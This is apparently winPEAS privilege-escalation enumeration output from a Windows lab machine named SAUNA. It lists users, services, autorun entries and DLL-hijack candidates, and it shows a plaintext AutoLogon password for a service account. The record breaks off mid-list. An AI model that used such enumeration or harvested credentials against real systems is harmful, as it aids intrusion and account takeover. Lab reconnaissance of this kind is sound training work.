    SeMachineAccountPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeIncreaseWorkingSetPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED

ÉÍÍÍÍÍÍÍÍÍÍ¹ Clipboard text

ÉÍÍÍÍÍÍÍÍÍÍ¹ Logged users
  [X] Exception: Access denied 
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Display information about local users
   Computer Name           :   SAUNA
   User Name               :   Administrator
   User Id                 :   500
   Is Enabled              :   True
   User Type               :   Administrator
   Comment                 :   Built-in account for administering the computer/domain
   Last Logon              :   7/18/2025 12:14:03 AM
   Logons Count            :   109
   Password Last Set       :   7/26/2021 9:16:16 AM

   =================================================================================================

   Computer Name           :   SAUNA
   User Name               :   Guest
   User Id                 :   501
   Is Enabled              :   False
   User Type               :   Guest
   Comment                 :   Built-in account for guest access to the computer/domain
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/1/1970 12:00:00 AM

   =================================================================================================

   Computer Name           :   SAUNA
   User Name               :   krbtgt
   User Id                 :   502
   Is Enabled              :   False
   User Type               :   User
   Comment                 :   Key Distribution Center Service Account
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/22/2020 10:45:30 PM

   =================================================================================================

   Computer Name           :   SAUNA
   User Name               :   HSmith
   User Id                 :   1103
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/22/2020 10:54:34 PM

   =================================================================================================

   Computer Name           :   SAUNA
   User Name               :   FSmith
   User Id                 :   1105
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   7/18/2025 2:42:15 AM
   Logons Count            :   9
   Password Last Set       :   1/23/2020 9:45:19 AM

   =================================================================================================

   Computer Name           :   SAUNA
   User Name               :   svc_loanmgr
   User Id                 :   1108
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/24/2020 4:48:31 PM

   =================================================================================================

ÉÍÍÍÍÍÍÍÍÍÍ¹ RDP Sessions
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Ever logged users
  [X] Exception: Access denied 
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Home folders found
    C:\\Users\\Administrator
    C:\\Users\\All Users
    C:\\Users\\Default
    C:\\Users\\Default User
    C:\\Users\\FSmith : FSmith [Allow: AllAccess]
    C:\\Users\\Public
    C:\\Users\\svc_loanmgr

ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!

ÉÍÍÍÍÍÍÍÍÍÍ¹ Password Policies
È Check for a possible brute-force 
    Domain: Builtin
    SID: S-1-5-32
    MaxPasswordAge: 42.22:47:31.7437440
    MinPasswordAge: 00:00:00
    MinPasswordLength: 0
    PasswordHistoryLength: 0
    PasswordProperties: 0
   =================================================================================================

    Domain: EGOTISTICALBANK
    SID: S-1-5-21-2966785786-3096785034-1186376766
    MaxPasswordAge: 42.00:00:00
    MinPasswordAge: 1.00:00:00
    MinPasswordLength: 7
    PasswordHistoryLength: 24
    PasswordProperties: DOMAIN_PASSWORD_COMPLEX
   =================================================================================================

ÉÍÍÍÍÍÍÍÍÍÍ¹ Print Logon Sessions

ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Processes Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

ÉÍÍÍÍÍÍÍÍÍÍ¹ Interesting Processes -non Microsoft-
È Check if any interesting processes for memory dump or if you could overwrite some binary running <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#running-processes>                                                                                                      
  [X] Exception: Access denied 

ÉÍÍÍÍÍÍÍÍÍÍ¹ Vulnerable Leaked Handlers
È  <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#leaked-handlers>
È Getting Leaked Handlers, it might take some time...
    Handle: 1212(key)
    Handle Owner: Pid is 2732(winPEASany) with owner: FSmith
    Reason: AllAccess
    Registry: HKLM\\software\\microsoft\\windows\\currentversion\\explorer\\folderdescriptions\\{1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}\\propertybag
   =================================================================================================

    Handle: 1652(key)
    Handle Owner: Pid is 2732(winPEASany) with owner: FSmith
    Reason: AllAccess
    Registry: HKLM\\system\\controlset001\\services\\crypt32
   =================================================================================================

ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Services Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
  [X] Exception: Cannot open Service Control Manager on computer '.'. This operation might require other privileges.

ÉÍÍÍÍÍÍÍÍÍÍ¹ Interesting Services -non Microsoft-
È Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#services>                                                                                                       
  [X] Exception: Access denied 
    @arcsas.inf,%arcsas_ServiceName%;Adaptec SAS/SATA-II RAID Storport's Miniport Driver(PMC-Sierra, Inc. - @arcsas.inf,%arcsas_ServiceName%;Adaptec SAS/SATA-II RAID Storport's Miniport Driver)[System32\\drivers\\arcsas.sys] - Boot
   =================================================================================================

    @netbvbda.inf,%vbd_srv_desc%;QLogic Network Adapter VBD(QLogic Corporation - @netbvbda.inf,%vbd_srv_desc%;QLogic Network Adapter VBD)[System32\\drivers\\bxvbda.sys] - Boot                                                                                                                                             
   =================================================================================================

    @bcmfn2.inf,%bcmfn2.SVCDESC%;bcmfn2 Service(Windows (R) Win 7 DDK provider - @bcmfn2.inf,%bcmfn2.SVCDESC%;bcmfn2 Service)[C:\\Windows\\System32\\drivers\\bcmfn2.sys] - System                                                                                                                                            
   =================================================================================================

    @bxfcoe.inf,%BXFCOE.SVCDESC%;QLogic FCoE Offload driver(QLogic Corporation - @bxfcoe.inf,%BXFCOE.SVCDESC%;QLogic FCoE Offload driver)[System32\\drivers\\bxfcoe.sys] - Boot                                                                                                                                             
   =================================================================================================

    @bxois.inf,%BXOIS.SVCDESC%;QLogic Offload iSCSI Driver(QLogic Corporation - @bxois.inf,%BXOIS.SVCDESC%;QLogic Offload iSCSI Driver)[System32\\drivers\\bxois.sys] - Boot                                                                                                                                                
   =================================================================================================

    @cht4vx64.inf,%cht4vbd.generic%;Chelsio Virtual Bus Driver(Chelsio Communications - @cht4vx64.inf,%cht4vbd.generic%;Chelsio Virtual Bus Driver)[C:\\Windows\\System32\\drivers\\cht4vx64.sys] - System                                                                                                                    
   =================================================================================================

    @net1ix64.inf,%e1iExpress.Service.DispName%;Intel(R) PRO/1000 PCI Express Network Connection Driver I(Intel Corporation - @net1ix64.inf,%e1iExpress.Service.DispName%;Intel(R) PRO/1000 PCI Express Network Connection Driver I)[C:\\Windows\\System32\\drivers\\e1i63x64.sys] - System
   =================================================================================================

    @netevbda.inf,%vbd_srv_desc%;QLogic 10 Gigabit Ethernet Adapter VBD(QLogic Corporation - @netevbda.inf,%vbd_srv_desc%;QLogic 10 Gigabit Ethernet Adapter VBD)[System32\\drivers\\evbda.sys] - Boot
   =================================================================================================

    @ialpssi_gpio.inf,%iaLPSSi_GPIO.SVCDESC%;Intel(R) Serial IO GPIO Controller Driver(Intel Corporation - @ialpssi_gpio.inf,%iaLPSSi_GPIO.SVCDESC%;Intel(R) Serial IO GPIO Controller Driver)[C:\\Windows\\System32\\drivers\\iaLPSSi_GPIO.sys] - System
   =================================================================================================

    @ialpssi_i2c.inf,%iaLPSSi_I2C.SVCDESC%;Intel(R) Serial IO I2C Controller Driver(Intel Corporation - @ialpssi_i2c.inf,%iaLPSSi_I2C.SVCDESC%;Intel(R) Serial IO I2C Controller Driver)[C:\\Windows\\System32\\drivers\\iaLPSSi_I2C.sys] - System
   =================================================================================================

    @iastorav.inf,%iaStorAVC.DeviceDesc%;Intel Chipset SATA RAID Controller(Intel Corporation - @iastorav.inf,%iaStorAVC.DeviceDesc%;Intel Chipset SATA RAID Controller)[System32\\drivers\\iaStorAVC.sys] - Boot
   =================================================================================================

    @iastorv.inf,%*PNP0600.DeviceDesc%;Intel RAID Controller Windows 7(Intel Corporation - @iastorv.inf,%*PNP0600.DeviceDesc%;Intel RAID Controller Windows 7)[System32\\drivers\\iaStorV.sys] - Boot
   =================================================================================================

    @mlx4_bus.inf,%Ibbus.ServiceDesc%;Mellanox InfiniBand Bus/AL (Filter Driver)(Mellanox - @mlx4_bus.inf,%Ibbus.ServiceDesc%;Mellanox InfiniBand Bus/AL (Filter Driver))[C:\\Windows\\System32\\drivers\\ibbus.sys] - System
   =================================================================================================

    @mlx4_bus.inf,%MLX4BUS.ServiceDesc%;Mellanox ConnectX Bus Enumerator(Mellanox - @mlx4_bus.inf,%MLX4BUS.ServiceDesc%;Mellanox ConnectX Bus Enumerator)[C:\\Windows\\System32\\drivers\\mlx4_bus.sys] - System                                                                                                              
   =================================================================================================

    @mlx4_bus.inf,%ndfltr.ServiceDesc%;NetworkDirect Service(Mellanox - @mlx4_bus.inf,%ndfltr.ServiceDesc%;NetworkDirect Service)[C:\\Windows\\System32\\drivers\\ndfltr.sys] - System                                                                                                                                        
   =================================================================================================

    @netqevbda.inf,%vbd_srv_desc%;QLogic FastLinQ Ethernet VBD(Cavium, Inc. - @netqevbda.inf,%vbd_srv_desc%;QLogic FastLinQ Ethernet VBD)[System32\\drivers\\qevbda.sys] - Boot                                                                                                                                             
   =================================================================================================

    @qefcoe.inf,%QEFCOE.SVCDESC%;QLogic FCoE driver(Cavium, Inc. - @qefcoe.inf,%QEFCOE.SVCDESC%;QLogic FCoE driver)[System32\\drivers\\qefcoe.sys] - Boot
   =================================================================================================

    @qeois.inf,%QEOIS.SVCDESC%;QLogic 40G iSCSI Driver(QLogic Corporation - @qeois.inf,%QEOIS.SVCDESC%;QLogic 40G iSCSI Driver)[System32\\drivers\\qeois.sys] - Boot
   =================================================================================================

    @ql2300.inf,%ql2300i.DriverDesc%;QLogic Fibre Channel STOR Miniport Inbox Driver (wx64)(QLogic Corporation - @ql2300.inf,%ql2300i.DriverDesc%;QLogic Fibre Channel STOR Miniport Inbox Driver (wx64))[System32\\drivers\\ql2300i.sys] - Boot
   =================================================================================================

    @ql40xx2i.inf,%ql40xx2i.DriverDesc%;QLogic iSCSI Miniport Inbox Driver(QLogic Corporation - @ql40xx2i.inf,%ql40xx2i.DriverDesc%;QLogic iSCSI Miniport Inbox Driver)[System32\\drivers\\ql40xx2i.sys] - Boot
   =================================================================================================

    @qlfcoei.inf,%qlfcoei.DriverDesc%;QLogic [FCoE] STOR Miniport Inbox Driver (wx64)(QLogic Corporation - @qlfcoei.inf,%qlfcoei.DriverDesc%;QLogic [FCoE] STOR Miniport Inbox Driver (wx64))[System32\\drivers\\qlfcoei.sys] - Boot
   =================================================================================================

    OpenSSH Authentication Agent(OpenSSH Authentication Agent)[C:\\Windows\\System32\\OpenSSH\\ssh-agent.exe] - Manual
    Agent to hold private keys used for public key authentication.
   =================================================================================================                                                         

    @usbstor.inf,%USBSTOR.SvcDesc%;USB Mass Storage Driver(@usbstor.inf,%USBSTOR.SvcDesc%;USB Mass Storage Driver)[C:\\Windows\\System32\\drivers\\USBSTOR.SYS] - System
   =================================================================================================

    @usbxhci.inf,%PCI\\CC_0C0330.DeviceDesc%;USB xHCI Compliant Host Controller(@usbxhci.inf,%PCI\\CC_0C0330.DeviceDesc%;USB xHCI Compliant Host Controller)[C:\\Windows\\System32\\drivers\\USBXHCI.SYS] - System                                                                                                              
   =================================================================================================

    VMware Alias Manager and Ticket Service(VMware, Inc. - VMware Alias Manager and Ticket Service)["C:\\Program Files\\VMware\\VMware Tools\\VMware VGAuth\\VGAuthService.exe"] - Autoload                                                                                                                                    
    Alias Manager and Ticket Service
   =================================================================================================                                                         

    @oem8.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service(VMware, Inc. - @oem8.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service)[C:\\Windows\\system32\\vm3dservice.exe] - Autoload                                                                                                                         
    @oem8.inf,%VM3DSERVICE_DESCRIPTION%;Helps VMware SVGA driver by collecting and conveying user mode information
   =================================================================================================                                                         

    @oem9.inf,%loc.vmciServiceDisplayName%;VMware VMCI Bus Driver(VMware, Inc. - @oem9.inf,%loc.vmciServiceDisplayName%;VMware VMCI Bus Driver)[System32\\drivers\\vmci.sys] - Boot                                                                                                                                         
   =================================================================================================

    Memory Control Driver(VMware, Inc. - Memory Control Driver)[C:\\Windows\\system32\\DRIVERS\\vmmemctl.sys] - Autoload
    Driver to provide enhanced memory management of this virtual machine.
   =================================================================================================                                                         

    @oem7.inf,%VMMouse.SvcDesc%;VMware Pointing Device(VMware, Inc. - @oem7.inf,%VMMouse.SvcDesc%;VMware Pointing Device)[C:\\Windows\\System32\\drivers\\vmmouse.sys] - System                                                                                                                                               
   =================================================================================================

    VMware Tools(VMware, Inc. - VMware Tools)["C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe"] - Autoload
    Provides support for synchronizing objects between the host and guest operating systems.
   =================================================================================================                                                         

    @oem6.inf,%VMUsbMouse.SvcDesc%;VMware USB Pointing Device(VMware, Inc. - @oem6.inf,%VMUsbMouse.SvcDesc%;VMware USB Pointing Device)[C:\\Windows\\System32\\drivers\\vmusbmouse.sys] - System                                                                                                                              
   =================================================================================================

    @oem4.inf,%loc.vmxnet3.ndis6.DispName%;vmxnet3 NDIS 6 Ethernet Adapter Driver(VMware, Inc. - @oem4.inf,%loc.vmxnet3.ndis6.DispName%;vmxnet3 NDIS 6 Ethernet Adapter Driver)[C:\\Windows\\System32\\drivers\\vmxnet3.sys] - System
   =================================================================================================

    vSockets Virtual Machine Communication Interface Sockets driver(VMware, Inc. - vSockets Virtual Machine Communication Interface Sockets driver)[system32\\DRIVERS\\vsock.sys] - Boot                                                                                                                                    
    vSockets Driver
   =================================================================================================                                                         

    @vstxraid.inf,%Driver.DeviceDesc%;VIA StorX Storage RAID Controller Windows Driver(VIA Corporation - @vstxraid.inf,%Driver.DeviceDesc%;VIA StorX Storage RAID Controller Windows Driver)[System32\\drivers\\vstxraid.sys] - Boot
   =================================================================================================

    @%SystemRoot%\\System32\\drivers\\vwifibus.sys,-257(@%SystemRoot%\\System32\\drivers\\vwifibus.sys,-257)[C:\\Windows\\System32\\drivers\\vwifibus.sys] - System
    @%SystemRoot%\\System32\\drivers\\vwifibus.sys,-258
   =================================================================================================                                                         

    @mlx4_bus.inf,%WinMad.ServiceDesc%;WinMad Service(Mellanox - @mlx4_bus.inf,%WinMad.ServiceDesc%;WinMad Service)[C:\\Windows\\System32\\drivers\\winmad.sys] - System
   =================================================================================================

    @winusb.inf,%WINUSB_SvcName%;WinUsb Driver(@winusb.inf,%WINUSB_SvcName%;WinUsb Driver)[C:\\Windows\\System32\\drivers\\WinUSB.SYS] - System
    @winusb.inf,%WINUSB_SvcDesc%;Generic driver for USB devices
   =================================================================================================                                                         

    @mlx4_bus.inf,%WinVerbs.ServiceDesc%;WinVerbs Service(Mellanox - @mlx4_bus.inf,%WinVerbs.ServiceDesc%;WinVerbs Service)[C:\\Windows\\System32\\drivers\\winverbs.sys] - System                                                                                                                                            
   =================================================================================================

ÉÍÍÍÍÍÍÍÍÍÍ¹ Modifiable Services
È Check if you can modify any service <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#services>
    You cannot modify any service

ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking if you can modify any service registry
È Check if you can modify the registry of a service <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#services-registry-modify-permissions>                                                                                                                                  
    [-] Looks like you cannot change the registry of any service...

ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking write permissions in PATH folders (DLL Hijacking)
È Check for DLL Hijacking in PATH folders <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dll-hijacking>
    C:\\Windows\\system32
    C:\\Windows
    C:\\Windows\\System32\\Wbem
    C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\
    C:\\Windows\\System32\\OpenSSH\\

ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Applications Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

ÉÍÍÍÍÍÍÍÍÍÍ¹ Current Active Window Application
  [X] Exception: Object reference not set to an instance of an object.

ÉÍÍÍÍÍÍÍÍÍÍ¹ Installed Applications --Via Program Files/Uninstall registry--
È Check if you can modify installed software <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#applications>
    C:\\Program Files\\Common Files
    C:\\Program Files\\desktop.ini
    C:\\Program Files\\internet explorer
    C:\\Program Files\\Uninstall Information
    C:\\Program Files\\VMware
    C:\\Program Files\\Windows Defender
    C:\\Program Files\\Windows Defender Advanced Threat Protection
    C:\\Program Files\\Windows Mail
    C:\\Program Files\\Windows Media Player
    C:\\Program Files\\Windows Multimedia Platform
    C:\\Program Files\\windows nt
    C:\\Program Files\\Windows Photo Viewer
    C:\\Program Files\\Windows Portable Devices
    C:\\Program Files\\Windows Security
    C:\\Program Files\\Windows Sidebar
    C:\\Program Files\\WindowsApps
    C:\\Program Files\\WindowsPowerShell

ÉÍÍÍÍÍÍÍÍÍÍ¹ Autorun Applications
È Check if you can modify other users AutoRuns binaries (Note that is normal that you can modify HKCU registry and binaries indicated there) <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html>                                         
Error getting autoruns from WMIC: System.Management.ManagementException: Access denied
   at System.Management.ThreadDispatch.Start()                                                                                                               
   at System.Management.ManagementScope.Initialize()                                                                                                         
   at System.Management.ManagementObjectSearcher.Initialize()                                                                                                
   at System.Management.ManagementObjectSearcher.Get()                                                                                                       
   at winPEAS.Info.ApplicationInfo.AutoRuns.GetAutoRunsWMIC()                                                                                                

    RegPath: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
    Key: SecurityHealth
    Folder: C:\\Windows\\system32
    File: C:\\Windows\\system32\\SecurityHealthSystray.exe
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
    Key: VMware VM3DService Process
    Folder: C:\\Windows\\system32
    File: C:\\Windows\\system32\\vm3dservice.exe -u
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
    Key: VMware User Process
    Folder: C:\\Program Files\\VMware\\VMware Tools
    File: C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe -n vmusr (Unquoted and Space detected) - C:\\
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders
    Key: Common Startup
    Folder: C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders
    Key: Common Startup
    Folder: C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon
    Key: Userinit
    Folder: C:\\Windows\\system32
    File: C:\\Windows\\system32\\userinit.exe,
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon
    Key: Shell
    Folder: None (PATH Injection)
    File: explorer.exe
   =================================================================================================

    RegPath: HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot
    Key: AlternateShell
    Folder: None (PATH Injection)
    File: cmd.exe
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Font Drivers
    Key: Adobe Type Manager
    Folder: None (PATH Injection)
    File: atmfd.dll
   =================================================================================================

    RegPath: HKLM\\Software\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Font Drivers
    Key: Adobe Type Manager
    Folder: None (PATH Injection)
    File: atmfd.dll
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: midimapper
    Folder: None (PATH Injection)
    File: midimap.dll
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: msacm.imaadpcm
    Folder: None (PATH Injection)
    File: imaadp32.acm
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: msacm.l3acm
    Folder: C:\\Windows\\System32
    File: C:\\Windows\\System32\\l3codeca.acm
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: msacm.msadpcm
    Folder: None (PATH Injection)
    File: msadp32.acm
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: msacm.msg711
    Folder: None (PATH Injection)
    File: msg711.acm
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: msacm.msgsm610
    Folder: None (PATH Injection)
    File: msgsm32.acm
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: vidc.i420
    Folder: None (PATH Injection)
    File: iyuv_32.dll
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: vidc.iyuv
    Folder: None (PATH Injection)
    File: iyuv_32.dll
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: vidc.mrle
    Folder: None (PATH Injection)
    File: msrle32.dll
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: vidc.msvc
    Folder: None (PATH Injection)
    File: msvidc32.dll
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: vidc.uyvy
    Folder: None (PATH Injection)
    File: msyuv.dll
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: vidc.yuy2
    Folder: None (PATH Injection)
    File: msyuv.dll
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: vidc.yvu9
    Folder: None (PATH Injection)
    File: tsbyuv.dll
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: vidc.yvyu
    Folder: None (PATH Injection)
    File: msyuv.dll
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: wavemapper
    Folder: None (PATH Injection)
    File: msacm32.drv
   =================================================================================================

    RegPath: HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: midimapper
    Folder: None (PATH Injection)
    File: midimap.dll
   =================================================================================================

    RegPath: HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: msacm.imaadpcm
    Folder: None (PATH Injection)
    File: imaadp32.acm
   =================================================================================================

    RegPath: HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: msacm.l3acm
    Folder: C:\\Windows\\SysWOW64
    File: C:\\Windows\\SysWOW64\\l3codeca.acm
   =================================================================================================

    RegPath: HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: msacm.msadpcm
    Folder: None (PATH Injection)
    File: msadp32.acm
   =================================================================================================

    RegPath: HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: msacm.msg711
    Folder: None (PATH Injection)
    File: msg711.acm
   =================================================================================================

    RegPath: HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: msacm.msgsm610
    Folder: None (PATH Injection)
    File: msgsm32.acm
   =================================================================================================

    RegPath: HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: vidc.cvid
    Folder: None (PATH Injection)
    File: iccvid.dll
   =================================================================================================

    RegPath: HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: vidc.i420
    Folder: None (PATH Injection)
    File: iyuv_32.dll
   =================================================================================================

    RegPath: HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: vidc.iyuv
    Folder: None (PATH Injection)
    File: iyuv_32.dll
   =================================================================================================

    RegPath: HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: vidc.mrle
    Folder: None (PATH Injection)
    File: msrle32.dll
   =================================================================================================

    RegPath: HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: vidc.msvc
    Folder: None (PATH Injection)
    File: msvidc32.dll
   =================================================================================================

    RegPath: HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: vidc.uyvy
    Folder: None (PATH Injection)
    File: msyuv.dll
   =================================================================================================

    RegPath: HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: vidc.yuy2
    Folder: None (PATH Injection)
    File: msyuv.dll
   =================================================================================================

    RegPath: HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: vidc.yvu9
    Folder: None (PATH Injection)
    File: tsbyuv.dll
   =================================================================================================

    RegPath: HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: vidc.yvyu
    Folder: None (PATH Injection)
    File: msyuv.dll
   =================================================================================================

    RegPath: HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32
    Key: wavemapper
    Folder: None (PATH Injection)
    File: msacm32.drv
   =================================================================================================

    RegPath: HKLM\\Software\\Classes\\htmlfile\\shell\\open\\command
    Folder: C:\\Program Files\\Internet Explorer
    File: C:\\Program Files\\Internet Explorer\\iexplore.exe %1 (Unquoted and Space detected) - C:\\
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: _wow64cpu
    Folder: None (PATH Injection)
    File: wow64cpu.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: _wowarmhw
    Folder: None (PATH Injection)
    File: wowarmhw.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: _xtajit
    Folder: None (PATH Injection)
    File: xtajit.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: advapi32
    Folder: None (PATH Injection)
    File: advapi32.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: clbcatq
    Folder: None (PATH Injection)
    File: clbcatq.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: combase
    Folder: None (PATH Injection)
    File: combase.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: COMDLG32
    Folder: None (PATH Injection)
    File: COMDLG32.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: coml2
    Folder: None (PATH Injection)
    File: coml2.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: DifxApi
    Folder: None (PATH Injection)
    File: difxapi.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: gdi32
    Folder: None (PATH Injection)
    File: gdi32.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: gdiplus
    Folder: None (PATH Injection)
    File: gdiplus.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: IMAGEHLP
    Folder: None (PATH Injection)
    File: IMAGEHLP.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: IMM32
    Folder: None (PATH Injection)
    File: IMM32.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: kernel32
    Folder: None (PATH Injection)
